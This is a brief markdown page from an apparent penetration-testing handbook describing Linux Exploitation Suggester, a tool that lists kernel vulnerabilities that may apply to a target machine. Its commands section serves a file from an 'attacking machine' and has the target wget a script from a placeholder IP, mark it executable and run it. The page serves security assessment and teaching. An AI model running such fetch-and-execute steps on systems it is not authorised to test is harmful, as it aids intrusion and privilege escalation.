handbook/tools/5.Machine/1.Linux/General/Tools/Linux Exploitation Suggester.md

25 lines
636 B
Markdown
Raw Normal View History

2024-08-30 23:07:22 +00:00
## General
Linux Exploitation Suggester (LES) is a tool that checks the operating system (OS) and version of a machine and suggests potential kernel vulnerabilities that could be exploited. LES is typically used by security professionals to assess the security of a system and identify weaknesses that need to be addressed.
## Commands
```
# Attacking Machine
python3 -m http.server
# Target Machine
wget http://IP/Name.sh
chmod +x NAME.sh
./NAME.sh
```
- Check for exposure (Probability of success)
## Linux Exploit Suggester
**All Information** ---> https://github.com/mzet-/linux-exploit-suggester